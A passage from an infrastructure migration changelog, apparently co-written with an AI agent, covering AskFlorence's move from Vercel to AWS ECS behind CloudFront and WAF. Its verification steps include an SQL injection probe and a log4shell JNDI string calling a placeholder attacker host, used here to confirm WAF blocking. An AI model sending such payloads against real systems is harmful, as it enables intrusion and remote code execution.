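                # Cross-account grant: prod task role may only PutObject under the prefix.
                "Sid": "AllowProdEcsTaskRolePutAgentSurveyUploads",
                "Effect": "Allow",
                "Principal": {"AWS": TASK_ROLE_ARN},
                "Action": "s3:PutObject",
                "Resource": f"arn:aws:s3:::{BUCKET}/{PREFIX}*",
            },
        ],
    }


def render_policy() -> str:
    """Serialize the policy for review or diffing."""
    return json.dumps(build_bucket_policy(), indent=2)
```

Because the writer is in a different account from the bucket, both sides must allow the action: this bucket policy on the mgmt side and the S3AgentSurveyUploadsWrite inline policy on the prod task role.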

Operational hygiene:

  • Prod task def revision :7 registered with the S3 bucket env + EMAIL_PROVIDER=ses. Service rolled over cleanly; 2 HA tasks stay healthy.
  • Prod ECS smoke endpoint in the workflow switched from prod-canary.askflorence.health (CloudFront + WAF — WAF false-positives the GitHub Actions runner IP) to origin.askflorence.health (direct ALB via the wildcard SAN CNAME). Three prior CI runs failed on the WAF block; once switched, runs go green.
  • Prod ECR configured for immutable tags. CI workflow shifted from inline buildx cache (embeds cache into the image tag, incompatible with immutable-tag rewrites) to GitHub Actions type=gha cache backend. No :latest pushed on prod — task defs pin to :<sha> only.

How

Four applies this session:

  1. terraform apply in infra/envs/management/ — adopted askflorence-data bucket policy as Terraform-managed (1 resource).
  2. terraform apply in infra/envs/prod/ — added S3AgentSurveyUploadsWrite inline policy to task role (1 resource).
  3. aws ecs register-task-definition out-of-band — new revision :7 with S3_AGENT_SURVEY_BUCKET env + EMAIL_PROVIDER=ses (per the ecs-service module's ignore_changes = [container_definitions] design, TF doesn't push env changes directly).
  4. aws ecs update-service — rollover to task def :7. Service stable on new revision.
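Steps 3 and 4 depend on turning the output of describe-task-definition into a payload that register-task-definition accepts. A minimal sketch of that transformation follows, assuming a container named "app" (hypothetical; the real container name is not stated here). It only prepares the payload; the AWS calls themselves are left to the CLI.

```python
import copy

# Fields present in describe-task-definition output that
# register-task-definition does not accept as input.
READ_ONLY_FIELDS = (
    "taskDefinitionArn", "revision", "status", "requiresAttributes",
    "compatibilities", "registeredAt", "registeredBy", "deregisteredAt",
)


def with_env(task_def: dict, container: str, updates: dict) -> dict:
    """Copy a task definition, drop read-only fields, merge env var updates."""
    payload = {
        key: copy.deepcopy(value)
        for key, value in task_def.items()
        if key not in READ_ONLY_FIELDS
    }
    for cdef in payload["containerDefinitions"]:
        if cdef["name"] != container:
            continue
        env = {item["name"]: item["value"] for item in cdef.get("environment", [])}
        env.update(updates)
        # Sorted for stable diffs between revisions.
        cdef["environment"] = [{"name": k, "value": v} for k, v in sorted(env.items())]
        return payload
    raise KeyError(f"container {container!r} not found")
```

The returned dict can be written to a file and passed to aws ecs register-task-definition --cli-input-json, followed by update-service pointing at the new revision.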

Cloudflare DNS cutover done via dashboard: both records edited, proxy turned OFF, TTL to 300s. Global DNS propagation < 1 min. First CloudFront edge log hit came in at SEA900-P10 within 15 seconds of save.

Rollback

  • DNS rollback (< 5 min): revert Cloudflare records — apex back to A 216.198.79.1 Proxied, www back to CNAME askflorence.health Proxied. Vercel deployment was not touched; serves seamlessly. Atlas allowlist still contains 0.0.0.0/0 so Vercel can still reach prod cluster.
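  • S3 upload rollback: remove the AllowProdEcsTaskRolePutAgentSurveyUploads statement from the bucket policy and the aws_iam_role_policy.task_inline["S3AgentSurveyUploadsWrite"] resource from the task role, then terraform apply. The bucket policy returns to its pre-Terraform content (just DenyNonSSLRequests). Avoid a plain terraform destroy of aws_s3_bucket_policy.askflorence_data: deleting that resource removes the whole policy document, DenyNonSSLRequests included. Task role loses upload permission; endpoint returns the original "bucket not configured" error. No user data lost; bucket contents untouched.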
  • Email provider rollback: flip EMAIL_PROVIDER task def env back to resend + re-register + update-service. Caveat: Resend account + domain are both in a broken state, so this is not actually a viable rollback today.

Verification

All from operator laptop through public internet, https://askflorence.health:

  • GET /api/health → 200 with "env":"prod" and commit SHA matching deployed image.
  • GET / + /plans + /agents + /agent-onboarding + /agent-discovery + /updates + /privacy + /terms → 200.
  • GET /api/counties?state={TX,NY}&zip=... → 200 identical JSON to Vercel.
  • POST /api/eligibility with correct nested {household,place,year} shape → 200 with APTC + CSR tier (matched Vercel).
  • POST /api/plans with same shape → 200 with 100 plans returned (matched Vercel).
  • POST /api/waitlist consumer + agent interest variants → 200 with real Mongo _id (write via peering).
  • POST /api/agents/discovery/upload with valid PDF + docType=custom + blankConfirmed=true → 200 with S3 object key. Object present in askflorence-data/agent-survey-uploads/.
  • GET /?id=1' OR '1'='1 → 403 via WAF SQLi rule.
  • Response headers: server: AskFlorence, CloudFront POP header, HSTS + CSP + X-Frame-Options DENY. No trace of Cloudflare proxy or Vercel in headers.
  • ECS service: desired 2, running 2, rollout COMPLETED, task def :7. Zero 5xx in last 10 min. 86+ real-user requests recorded on the ALB.
  • Phase 9 HTTP parity probe (pre-cutover gate): 60/60 across 20 stratified scenarios × 3 endpoints. 100%.
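The response-header check in the list above lends itself to a small repeatable assertion. The sketch below is illustrative only: the expected values come from this entry, while the forbidden header names (cf-ray for the Cloudflare proxy, x-vercel-id for Vercel) are an assumption about what "trace" means in practice.

```python
REQUIRED_VALUES = {
    "server": "AskFlorence",
    "x-frame-options": "DENY",
}
REQUIRED_PRESENT = ("strict-transport-security", "content-security-policy")
# Assumed markers of the retired proxy path; extend as needed.
FORBIDDEN = ("cf-ray", "x-vercel-id")


def header_problems(headers: dict) -> list:
    """Return human-readable problems; an empty list means the check passed."""
    lowered = {name.lower(): value for name, value in headers.items()}
    problems = []
    for name, expected in REQUIRED_VALUES.items():
        if lowered.get(name) != expected:
            problems.append(f"{name}: expected {expected!r}, got {lowered.get(name)!r}")
    for name in REQUIRED_PRESENT:
        if name not in lowered:
            problems.append(f"{name}: missing")
    for name in FORBIDDEN:
        if name in lowered:
            problems.append(f"{name}: should not be present")
    return problems
```

Feeding it the headers from a curl -I or an HTTP client response gives a pass/fail list that can be attached to the verification record.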

What this phase does NOT do

  • Does not retire Vercel. Vercel keeps running as rollback target for 48h. Archive at T+48h if clean.
  • Does not remove 0.0.0.0/0 from prod Atlas IP access list. Vercel path stays until archive. Post-48h task.
  • Does not retire Resend API key. Account-level retirement is a Phase 11 task.
  • Does not grant SES prod access. Separate AWS support ticket filed with the conservative framing; typical turnaround 24-72h.
  • Does not provision narrow-scoped prod Atlas writers. #56 prod follow-up session.

2026-04-23T02:00Z — Phase 8 prod AWS mirror live (canary) ​

Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211 + mgmt 778477254880); atlas CLI against prod project 69dc20c64005b222804dafa4; agent: Claude Opus 4.7
Linked: Issue #47 Phase 8; session log 2026-04-22-phase-8-prod-mirror.md; commits 611f268, 03a8dfc, a189041, release v0.17.0.

Why

Staging has been fully validated through Phases 0-7 — the Next.js app runs on AWS ECS with peered Atlas connectivity behind CloudFront + WAF, and every integration has been end-to-end exercised. Phase 8 replays the same Terraform into the prod AWS account so the prod AWS stack is standing and serving traffic on a private canary URL before Phase 10 cutover. No real user is moved in this phase. Vercel keeps serving askflorence.health + www exactly as before.

What shipped

AWS (prod account 039624954211):

  • VPC 10.20.0.0/16, 2 AZs, 2 NAT gateways (HA), 6 multi-AZ VPC endpoints.
  • KMS CMK alias/askflorence-prod, rotation on.
  • 15 prod/* Secrets Manager entries. Populated from Vercel env + rotated app-write password + stopgap population of narrow-scoped write secrets with the broad app-write URI until #56 prod session.
  • ACM cert askflorence.health + www + *.askflorence.health, DNS-validated via 2 Cloudflare CNAMEs, status ISSUED.
  • SES identity updates.askflorence.health, DKIM + MAIL FROM SUCCESS, DMARC p=quarantine, 6 DNS records added at Cloudflare. Account still in sandbox.
  • ECR askflorence-app with immutable tags, scan-on-push, 50-image retention, CMK-encrypted.
  • ECS cluster askflorence-prod, service askflorence-prod-app with 2 HA tasks (0.5 vCPU / 1 GB each), 90-day log retention.
  • ALB askflorence-prod-alb-1177205004.us-east-1.elb.amazonaws.com with HTTPS + deletion protection ON.
  • CloudFront distribution E9RU8LOGSYL9I (d1pnfyzua893hx.cloudfront.net) serving 3 aliases (apex + www + prod-canary), PriceClass_All, same WAFv2 ruleset as staging, same response-headers policy.
  • Atlas prod peering pcx-0cefe999865679045, routes in both prod private RTs, allowlist +10.20.0.0/16 (0.0.0.0/0 kept until Phase 10).
  • GitHub Actions deploy-prod.yml — workflow_dispatch trigger, OIDC federation, smokes origin.askflorence.health to bypass WAF-on-runner-IP false positives.

Cloudflare (manual adds by Taha): 10 DNS records total — 2 ACM validation CNAMEs, 6 SES verification records, 1 origin CNAME → ALB, 1 prod-canary CNAME → CloudFront.

MongoDB Atlas (prod project 69dc20c64005b222804dafa4): app-write password rotated (safe — Vercel's MONGODB_WRITE_URI was empty), 10.20.0.0/16 added to IP access list, peering connection established + routes.

Module changes:

  • infra/modules/cloudfront-waf/ gained an extra_aliases list var (default [] — backward-compatible for staging) so one distribution can serve multiple hostnames.

How

Same Terraform modules as staging, called from infra/envs/prod/ with prod-scoped inputs. Four sequential terraform apply passes: (1) network + KMS (28 resources), (2) secrets + ACM (31 resources), (3) SES (6 resources), (4) compute + edge (24 resources). Peering adopted via terraform import + one follow-up apply to reconcile tags + auto_accept flag.

Rollback

  • Canary out of traffic: delete the prod-canary.askflorence.health CNAME in Cloudflare. Distribution stays up but no one reaches it.
  • Scale ECS to 0: aws ecs update-service --cluster askflorence-prod --service askflorence-prod-app --desired-count 0. Apex + www are still Vercel, so real users are unaffected.
  • Full teardown: terraform destroy against infra/envs/prod/ after removing enable_deletion_protection on the ALB. CloudFront distribution disables + deletes (~15 min). VPC + KMS + secrets destroy. Atlas peering stays active on Atlas side (needs atlas networking peering delete to fully remove).
  • No Vercel rollback needed — no Vercel change was made.

Verification

All at https://prod-canary.askflorence.health (the non-advertised canary URL):

  • GET /api/health → 200 with commit SHA + env=prod
  • GET /api/counties?state={TX,NY}&zip=... → 200, response body identical to Vercel prod on same input
  • POST /api/waitlist → 200 with real waitlist_submission_id; Mongo write routed via peering (NAT never touched)
  • GET /?id=1' OR '1'='1 → 403 via WAF SQLi rule
  • Response headers from CloudFront: server: AskFlorence, HSTS (1 yr + preload), CSP, X-Frame-Options DENY, x-amz-cf-pop: LAX53-P6
  • ECS: 2 tasks, rollout COMPLETED, task def :4
  • CloudWatch aws-waf-logs-askflorence-prod-web-acl receiving WAF logs
  • ECS app log group receiving request logs

Pre-existing bug flagged

MONGODB_WRITE_URI on Vercel prod is empty (since 2026-04-16 per the env-var modification timestamp). All writes from Vercel prod (consumer waitlist, agent discovery, unsubscribe) have been failing with "MONGODB_URI_WAITLIST_WRITE or MONGODB_URI_SURVEY_WRITE or MONGODB_WRITE_URI must be set" for ~6 days. Not caused by Phase 8, surfaced by Phase 8. Follow-up: Taha sets the new MONGODB_WRITE_URI on Vercel (the app-write URI this phase populated into prod/mongodb/app-write).
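The failure mode here is that an env var set to the empty string behaves like an unset one. A minimal sketch of a resolver that would produce the quoted error is shown below; the lookup order and the function name are assumptions inferred from the error text, not the application's actual code.

```python
WRITE_URI_VARS = (
    "MONGODB_URI_WAITLIST_WRITE",
    "MONGODB_URI_SURVEY_WRITE",
    "MONGODB_WRITE_URI",
)


def resolve_write_uri(env) -> str:
    """Return the first non-empty write URI, treating "" the same as unset."""
    for name in WRITE_URI_VARS:
        value = env.get(name, "").strip()
        if value:
            return value
    raise RuntimeError(" or ".join(WRITE_URI_VARS) + " must be set")
```

Calling resolve_write_uri(os.environ) once at start-up, rather than on the first write, would have turned roughly six days of silent request-time failures into a failed deploy.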

What this phase does NOT do

  • Does not move any production DNS.
  • Does not change any Vercel config.
  • Does not retire anything (Resend, Vercel, Atlas 0.0.0.0/0 entry).
  • Does not provision narrow-scoped prod Atlas writers (stays as a #56 follow-up).
  • Does not request SES production access.

2026-04-22T22:30Z — Phase 7 staging Atlas VPC peering + M0 → M10 upgrade ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); atlas CLI against staging project 69e31af12fd2c0aef51bbb41; agent: Claude Opus 4.7
Linked: Issue #47 Phase 7; session log.

Why

Staging's Mongo traffic egressed to Atlas over the public internet via the NAT gateway, with Atlas's IP access list scoped to the NAT EIP 54.164.140.5/32 + the operator's laptop IP. Works, but leaves a public network path open. Phase 7 replaces that path with an AWS VPC peering connection into Atlas's dedicated VPC, then tightens the Atlas allowlist to a single VPC-CIDR entry. Post-apply: all Mongo traffic rides the AWS private network end to end, and an allowlist that admits only the VPC CIDR is the durable proof.

M0 doesn't support peering (shared tier, AWS account is Atlas's own), so the cluster was first upgraded to M10 dedicated — same region, same SRV hostname, same users, same URIs.

What shipped

Atlas (staging project 69e31af12fd2c0aef51bbb41):

  • Cluster upgrade: M0 (TENANT) → M10 (AWS us-east-1, MongoDB 8.0.21, 10 GB disk). Upgrade took ~3 min on the API (UPDATING → IDLE), driven via atlas clusters upgrade --tier M10 --diskSizeGB 10 --mdbVersion 8.0. connectionStrings.standardSrv preserved as mongodb+srv://askflorence-staging.efsikmv.mongodb.net → zero secret re-population.
  • Auto-provisioned network container on the project (Atlas allocates one AWS VPC per project+region on first M10): container 69e9356ea15f1b75005337a8, Atlas VPC vpc-0c1e118736ac1fb74 in Atlas's account 354811016174, CIDR 192.168.248.0/21, region US_EAST_1.
  • Peering connection created via atlas networking peering create aws: Atlas peering ID 69e939017b7816840c17063c, resulting AWS peering ID pcx-05d74ae6d34a31a02. Status progressed INITIATING → AVAILABLE on Atlas and pending-acceptance → active on AWS.
  • IP access list tightened from 2 entries (54.164.140.5/32 NAT EIP, 136.38.212.186/32 Taha laptop) → 1 entry (10.40.0.0/16 staging VPC CIDR). Public path to Atlas is now closed; only traffic originating in our VPC can reach the cluster.

AWS staging (549136075525):

  • VPC peering accepter — aws_vpc_peering_connection_accepter.atlas_staging resource in Terraform (imported from the out-of-band-created peering). AllowDnsResolutionFromRemoteVpc=true on the accepter side so Atlas's split-horizon DNS returns private shard IPs when queried from within our VPC.
  • Routes added to both private route tables (rtb-0b5a5b1da1f0a99c4, rtb-00fc1026859373d4f): 192.168.248.0/21 → pcx-05d74ae6d34a31a02. Managed as aws_route.atlas_from_private_{a,b} Terraform resources.
  • Network module updated: aws_route_table.private now has lifecycle { ignore_changes = [route] }, so external aws_route resources (peering, future transit gateway) don't conflict with the inline 0.0.0.0/0 → NAT default. Added private_route_table_ids + public_route_table_ids module outputs.
  • ECS service force-new-deployment after peering activated so the running task picked up fresh DNS + TLS state (the pre-existing task's MongoClient had cached connections over the public path, which surfaced as 30s server-selection timeouts until the task was replaced).
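The CIDR facts above can be sanity-checked with the standard library: peering requires the two VPC ranges not to overlap, the tightened allowlist should reject both former public sources, and only Atlas-bound traffic should take the peering route. This is a simplified sketch; the task IP 10.40.1.25 and the shard IP 192.168.250.10 are hypothetical, and the route model ignores the VPC-local route.

```python
import ipaddress

STAGING_VPC = ipaddress.ip_network("10.40.0.0/16")
ATLAS_VPC = ipaddress.ip_network("192.168.248.0/21")
ALLOWLIST = [STAGING_VPC]  # Atlas IP access list after tightening


def allowed(source_ip: str) -> bool:
    """Would Atlas accept a connection from this source address?"""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net for net in ALLOWLIST)


def route_for(dest_ip: str) -> str:
    """Which private route table target handles this destination (simplified)."""
    addr = ipaddress.ip_address(dest_ip)
    return "peering" if addr in ATLAS_VPC else "nat"
```

For example, allowed("54.164.140.5") is False for the old NAT EIP, while route_for on an address inside 192.168.248.0/21 resolves to the peering connection and any public address still resolves to NAT.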

No Vercel change. No app code change. No Mongo URI change. Everything in this phase is purely networking + tier.

Tricky bit worth preserving

After removing the NAT-EIP allowlist entry but before forcing a fresh ECS task, /api/waitlist returned HTTP 504 Gateway Timeout with ECS logs showing MongoServerSelectionError: Server selection timed out after 30000 ms. Briefly re-added the NAT EIP to keep the service serving while debugging. Diagnosis: the running task held DNS + connection state from before peering went live, so it was still trying to reach shards over the (now-blocked) public path. aws ecs update-service --force-new-deployment rotated the task; new task's fresh SRV lookup from within the peered VPC returned Atlas's private IPs, and the connection went green through peering. NAT EIP removed again cleanly. This is the canonical "peering-on-existing-cluster" gotcha — noting explicitly so Phase 8 prod peering runs force-new-deployment immediately after allowlist tightening, not 20 minutes later.

Rollback

  • Immediate (app breaking): re-add 54.164.140.5/32 to the Atlas allowlist via atlas accessLists create 54.164.140.5 --type ipAddress --projectId 69e31af12fd2c0aef51bbb41. Public path returns within 30s. The peered path stays wired in parallel.
  • Full: atlas networking peering delete 69e939017b7816840c17063c --projectId 69e31af12fd2c0aef51bbb41 + remove the peering-related routes + aws_vpc_peering_connection_accepter from Terraform. Atlas CIDR route drops; traffic falls back to NAT path.
  • Cluster downgrade M10 → M0: not supported by Atlas (one-way). To un-do the tier upgrade, destroy + recreate at M0 with a scrubbed data dump. Deliberate non-goal — M10 is where staging stays.

Verification

All from operator laptop over public internet (staging proxied through CloudFront from Phase 6):

  1. GET https://stage.askflorence.health/api/health → HTTP 200.
  2. POST https://stage.askflorence.health/api/waitlist {...} → HTTP 200 with real Mongo waitlist_submission_id while Atlas allowlist is scoped to 10.40.0.0/16 only (operator laptop IP NOT in allowlist, NAT EIP NOT in allowlist — the only reachable path from the ECS task to Atlas is the peering connection).
  3. GET https://stage.askflorence.health/api/counties?state=TX&zip=75001 → HTTP 200 with TX county data — proves the CMS proxy path (which egresses via NAT to the public internet) is unaffected by the Atlas peering change.
  4. atlas accessLists list returns exactly one entry: 10.40.0.0/16.
  5. aws ec2 describe-vpc-peering-connections shows pcx-05d74ae6d34a31a02 status active with accepter AllowDnsResolutionFromRemoteVpc=true.
  6. Private RT routes confirmed: both private RTs have 192.168.248.0/21 → pcx-05d74ae6d34a31a02 active.
  7. Terraform plan clean after import + apply.

What this phase does NOT do

  • No change to prod Atlas. Prod project is untouched. Phase 8 re-peers the existing M10 HIPAA prod cluster to the new prod VPC.
  • No PrivateLink on staging. VPC peering is the chosen mechanism; PrivateLink is redundant on top and costlier.
  • No cluster backup enabled on staging. M10 supports PITR but staging has no PHI and no production-traffic recovery requirement. Backup stays off; prod has PITR.
  • No secret rotation. The staging/mongodb/* Secrets Manager entries still hold the M0-era SRV URI, which is identical to the M10 SRV URI — no rotation required.

2026-04-22T05:30Z — Phase 6 staging front door: CloudFront + WAFv2 + security headers ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); agent: Claude Opus 4.7
Linked: Issue #47 Phase 6; plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md.

Why

Phase 5 exposed the staging ECS service directly to the public internet via an ALB with just a TLS cert. Phase 6 puts a CloudFront distribution + WAFv2 web ACL in front of that ALB. Three goals:

  1. Edge protection. Every request now passes through WAFv2 with five AWS managed rule groups (Common, KnownBadInputs, SQLi, IpReputation, AnonymousIp) plus a rate-based rule (2000 req/5min/IP). SQLi probes and log4shell-style payloads are rejected at the edge before reaching ECS.
  2. Security headers + IP-opacity. CloudFront's response-headers policy appends HSTS, CSP, X-Frame-Options, Referrer-Policy, X-Content-Type-Options and overrides Server → AskFlorence. Strips X-Powered-By + framework version headers. Brings the staging stack in line with the migration plan's "a competitor inspecting headers should not identify our stack" requirement.
  3. Prod-stencil validation. Everything in this module is going to be re-applied verbatim in askflorence-prod at Phase 8. Staging is where we iterated the Terraform, the origin pattern, and the CSP directive set — cheap mistakes now instead of expensive ones at cutover.
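To make the rate-based rule in goal 1 concrete, the sketch below models a per-IP limit of 2000 requests over a trailing 5-minute window. It illustrates the idea only; it is not how AWS WAF evaluates the rule internally, and the class name is hypothetical.

```python
from collections import defaultdict, deque

LIMIT = 2000          # requests per window, per source IP
WINDOW_SECONDS = 300  # 5 minutes


class SlidingWindowLimiter:
    """Per-IP sliding-window counter (illustrative model of a rate-based rule)."""

    def __init__(self, limit: int = LIMIT, window: float = WINDOW_SECONDS):
        self.limit = limit
        self.window = window
        self._hits = defaultdict(deque)

    def allow(self, ip: str, now: float) -> bool:
        hits = self._hits[ip]
        # Drop timestamps that have aged out of the trailing window.
        while hits and hits[0] <= now - self.window:
            hits.popleft()
        hits.append(now)
        return len(hits) <= self.limit
```

Each source IP is tracked independently, so one noisy client being throttled does not affect requests from other addresses.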

What shipped

New Terraform module infra/modules/cloudfront-waf/:

  • aws_wafv2_web_acl.this — CLOUDFRONT scope, default action Allow, 6 rules (priorities 0-100).
  • aws_cloudwatch_log_group.waf — CMK-encrypted, 14-day retention on staging. Named aws-waf-logs-* per AWS WAF's hard requirement.
  • aws_cloudwatch_log_resource_policy.waf — authorizes delivery.logs.amazonaws.com to write to aws-waf-logs-* in this account, constrained by aws:SourceAccount + aws:SourceArn.
  • aws_wafv2_web_acl_logging_configuration.this — attaches the log group to the web ACL, redacts authorization + cookie headers.
  • aws_cloudfront_response_headers_policy.this — security headers + header-strip (X-Powered-By, X-AspNet*-Version).
  • aws_cloudfront_distribution.this — HTTPS-only origin, origin shield us-east-1, HTTP/2+HTTP/3, TLSv1.2_2021 minimum, two cache behaviors (default CachingDisabled for SSR, /_next/static/* CachingOptimized).
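The two cache behaviors on the distribution amount to a first-match lookup on the request path. A rough model follows, assuming that shell-style wildcard matching is a close enough stand-in for CloudFront path patterns in this simple case; the function name is hypothetical.

```python
from fnmatch import fnmatchcase

# Ordered behaviors: the first matching pattern wins, otherwise the default applies.
ORDERED_BEHAVIORS = [
    ("/_next/static/*", "CachingOptimized"),
]
DEFAULT_POLICY = "CachingDisabled"  # SSR responses are never cached at the edge


def cache_policy_for(path: str) -> str:
    """Return the managed cache policy name that would apply to a request path."""
    for pattern, policy in ORDERED_BEHAVIORS:
        if fnmatchcase(path, pattern):
            return policy
    return DEFAULT_POLICY
```

Static build assets under /_next/static/ are content-hashed, which is why they can safely use CachingOptimized while every other path falls through to CachingDisabled.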

Staging wiring infra/envs/staging/cloudfront.tf:

  • Module called with alias = "stage.askflorence.health", origin_hostname = "origin.stage.askflorence.health".
  • stage.askflorence.health A-alias swung in place from ALB → CloudFront.
  • New stage.askflorence.health AAAA-alias added (CloudFront supports IPv6 natively).
  • origin.stage.askflorence.health A-alias added pointing at ALB. Covered by wildcard SAN on the existing ACM cert so CloudFront-to-ALB HTTPS handshake validates.

Resources created in the staging account (549136075525):

| Kind | Name / ID |
| --- | --- |
| CloudFront distribution | EJQQLYE9IE4U9 (dk0jmb66fh49u.cloudfront.net) |
| WAFv2 web ACL | askflorence-staging-web-acl (arn:...webacl/askflorence-staging-web-acl/4d7e1072-04b4-466b-b67a-5ce03036757d) |
| Response-headers policy | askflorence-staging-response-headers |
| CloudWatch log group | aws-waf-logs-askflorence-staging-web-acl (14d retention, staging CMK) |
| Route 53 A/AAAA | stage.askflorence.health → CloudFront |
| Route 53 A | origin.stage.askflorence.health → ALB |

How

  • AWS_PROFILE=askflorence-staging terraform apply (backend via TerraformBackendRole in mgmt from Phase 3 pattern).
  • Single apply; the existing aws_route53_record.stage_alias Terraform address was moved from alb.tf → cloudfront.tf with a retargeted alias, producing one in-place Route 53 update and zero DNS gap.
  • First CloudFront distribution create took ~3 min (fast for CloudFront — sometimes it's 15+).
  • One apply-time surprise: the CloudFront API rejects Via as a removable header even though the documented valid-values list includes it. The module comments note this; Via isn't in the strip list. CloudFront adds its own Via header identifying the CDN (not the origin), which is acceptable given TLS ALPN + cert SANs already reveal we're behind CloudFront.

Rollback

  • DNS rollback (5 min): terraform apply a prior commit to revert stage.askflorence.health alias back to the ALB. CloudFront distribution stays up, just unreferenced.
  • Distribution disable: aws cloudfront update-distribution with Enabled=false — serves a 403 to viewers until re-enabled or DNS rolls back.
  • Full destroy: terraform destroy on the module.cloudfront_staging targets. Note CloudFront takes ~15 min to destroy even when disabled (AWS's unavoidable propagation step).
  • No Vercel prod impact from any rollback scenario — this phase only touches the staging account.

Verification

  • GET https://stage.askflorence.health/api/health → HTTP 200, via LAX54-P10 CloudFront edge, response headers include: server: AskFlorence, strict-transport-security: max-age=31536000; includeSubDomains; preload, x-frame-options: DENY, referrer-policy: strict-origin-when-cross-origin, x-content-type-options: nosniff, full CSP directive.
  • SQLi probe GET /?id=1%27%20OR%20%271%27=%271 → HTTP 403 (AWSManagedRulesSQLiRuleSet block).
  • Log4shell probe User-Agent: ${jndi:ldap://attacker.example/a} → HTTP 403 (KnownBadInputsRuleSet block).
  • Normal GET / → HTTP 200.
  • X-Powered-By absent from response (confirmed via curl -I).
  • Origin cert validation: CloudFront → ALB via origin.stage.askflorence.health handshakes clean (covered by *.stage.askflorence.health wildcard on the existing ACM cert).
  • Vercel regression: none possible — this phase never touched Vercel.
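The SQLi probe path in the list above is the percent-encoded form of the payload 1' OR '1'='1 with the equals sign left as-is. A small sketch for regenerating it, so the probe stays reproducible; the function name is hypothetical.

```python
from urllib.parse import quote

SQLI_PAYLOAD = "1' OR '1'='1"
LOG4SHELL_USER_AGENT = "${jndi:ldap://attacker.example/a}"  # sent as a header, not encoded


def sqli_probe_path(payload: str = SQLI_PAYLOAD) -> str:
    """Build the probe path; '=' is kept literal to match the logged request."""
    return "/?id=" + quote(payload, safe="=")


# sqli_probe_path() -> "/?id=1%27%20OR%20%271%27=%271"
```

Both probes are expected to return HTTP 403 from the edge, while a plain GET / returns 200.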

What this phase does NOT do

  • CloudFront access logs are not enabled. Audit evidence is covered by WAF logs + org CloudTrail + ALB access logs (already on). Standard access logs can be added in a follow-up if needed.
  • Real-time logging to Kinesis Data Streams not wired. WAF logs go to CloudWatch directly, which is simpler and meets the evidence requirement.
  • Lambda@Edge not used. Header scrubbing beyond what RemoveHeadersConfig allows (specifically Via) would require Lambda@Edge — not in scope for v1.
  • Prod account unchanged. Phase 8 mirror will take this module and call it in infra/envs/prod/ with a prod-scoped alias + cert.

2026-04-21T09:30Z — Phase 5 staging go-live: ECR + ECS + ALB + SES path + PostHog opt-out ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); agent: Claude Opus 4.7
Linked: Issue #47 Phases 5.1–5.7; Issue #56 staging-side waitlist user; session log 2026-04-21-phase-5-staging-go-live.md; commits e24c5ca, 44c1493, 90d05af, 04cfd35.

Why

Phases 1–4 built the AWS scaffolding (accounts, org baseline, Terraform, networking, KMS, secrets, ACM, SES identity, Route 53 subzone). Phase 5 is when the Next.js app actually starts running on it. Goal: the exact same build that Vercel serves today should be reachable on stage.askflorence.health via AWS ECS with no feature regressions, and every outbound integration (Atlas, CMS API, SES, PostHog) should work through the staging network path without weakening security posture. Vercel prod continues to serve askflorence.health unchanged through the entire phase.

What shipped

AWS (staging account 549136075525):

  • New ECR repository askflorence-app (immutable tag policy, scan-on-push, KMS-encrypted).
  • New ECS cluster askflorence-staging with Fargate + FARGATE_SPOT capacity providers; Container Insights on.
  • New ECS task definition family askflorence-staging-app-task — 0.25 vCPU / 0.5 GB, non-root UID 1001, port 3000, awslogs driver to /aws/ecs/askflorence-staging-app (14-day retention, CMK-encrypted).
  • New ECS service askflorence-staging-app (desired count 1, minimum healthy 100% / maximum 200% for rollover; deployment circuit breaker on).
  • New ALB askflorence-staging-alb in the 2 public subnets. HTTPS listener with the stage.askflorence.health ACM cert from Phase 4; HTTP redirects to HTTPS. Target group askflorence-staging-tg health-checks GET /api/health on port 3000.
  • Route 53 stage.askflorence.health A-alias record → staging ALB.
  • Task execution role permissions for secretsmanager:GetSecretValue + kms:Decrypt on each staging secret ARN and the staging CMK. Task role permissions for ses:SendEmail/ses:SendRawEmail.
  • Task role SES policy widened mid-session from identity/stage.askflorence.health to identity/* (still account-scoped). SES authorizes on every identity referenced in a send (From + To/CC/BCC), and sandbox requires the recipient identity also be verified in-account; the narrower scope was rejecting sends to the verified taha@askflorence.health sandbox recipient. Tighter scoping will return post-cutover once the account is out of sandbox and recipient-identity verification is no longer relevant.
  • staging/mongodb/waitlist-write Secrets Manager secret populated with a real URI (was the placeholder string since Phase 4). New secret version e2d9dc25-a1f4-4235-a065-8acf67433892.
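The SES policy widening above follows from how the entry describes authorization: every identity referenced in a send must match the policy's Resource. The sketch below models that reasoning with shell-style wildcard matching as an approximation of IAM resource matching. The region us-east-1 is an assumption (the SES region is not stated here), and the helper names are hypothetical.

```python
from fnmatch import fnmatchcase

ACCOUNT_ID = "549136075525"
REGION = "us-east-1"  # assumed; the entry does not name the SES region


def identity_arn(identity: str) -> str:
    """Build an SES identity ARN (or ARN pattern when identity is '*')."""
    return f"arn:aws:ses:{REGION}:{ACCOUNT_ID}:identity/{identity}"


def send_authorized(resource_pattern: str, identities: list) -> bool:
    """True only if every identity referenced by the send matches the pattern."""
    return all(fnmatchcase(identity_arn(i), resource_pattern) for i in identities)
```

With the narrow pattern identity_arn("stage.askflorence.health"), a send that also references the verified sandbox recipient taha@askflorence.health is rejected; with identity_arn("*") the same send passes while remaining scoped to the account.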

Atlas (staging project 69e31af12fd2c0aef51bbb41):

  • New custom role role_writer_waitlist — 7 actions (FIND, INSERT, UPDATE, REMOVE, CREATE_INDEX, DROP_INDEX, COLL_MOD) scoped to askflorence.agent_waitlist_submissions.
  • New DB user app_writer_waitlist (password-auth, 32-char alphanumeric, never echoed; temp-file handoff into Secrets Manager + .env.staging.local).
  • Prod project untouched.
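A 32-character alphanumeric password like the one described for app_writer_waitlist can be produced with a cryptographically secure generator. This is a minimal sketch of one way to do it, not a record of the tool actually used in the session; the function name is hypothetical.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits  # alphanumeric only: safe inside a URI


def generate_password(length: int = 32) -> str:
    """Return a random alphanumeric password drawn from the OS CSPRNG."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))
```

Restricting the alphabet to letters and digits avoids percent-encoding problems when the password is embedded in a mongodb+srv:// connection string.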

App code (commits on main, pushed to staging branch for GH Actions deploy):

